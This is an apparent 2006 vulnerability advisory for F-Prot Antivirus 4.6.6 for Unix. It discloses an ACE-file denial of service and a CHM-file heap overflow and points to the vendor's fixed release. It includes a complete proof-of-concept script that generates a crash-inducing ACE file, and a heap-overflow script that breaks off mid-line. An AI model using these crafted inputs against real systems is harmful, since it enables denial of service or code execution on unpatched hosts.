Name: F-Prot Antivirus for Unix: heap overflow and Denial of Service Vendor: http://www.f-prot.com Release date: 4 Dec, 2006 URL: http://gleg.net/fprot.txt Author: Evgeny Legerov I. DESCRIPTION Two vulnerabilities in F-Prot Antivirus 4.6.6 for Unix platforms could allow a remote attacker to cause a DoS or execute an arbitrary code. II. DETAILS 1. ACE file Denial of Service When parsing a specially crafted ACE compressed file F-Prot Antivirus will enter in an infinite loop. See fprot1.py for more details. 2. CHM file heap overflow When parsing a specially crafted CHM file a heap overflow will occur in F-Prot Antivirus. See fprot2.py for more details. III. VENDOR RESPONSE Update to F-Prot 4.6.7: http://www.f-prot.com/news/gen_news/061201_release_unix467.html IV. EXPLOITS # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # To test this code on Linux: # # create ACE compressed file # $ ./fprot1.py > 1.ace # $ f-prot 1.ace import sys import struct ACE=""" 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 41 41 41 41 41 """ s = "" for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: s += i sys.stdout.write(s) # fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap # overflow # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # $ ./fprot2.py > 1.chm # $ f-prot 1.chm import sys import struct s="" s+="ITSF" # signature s+=struct.pack("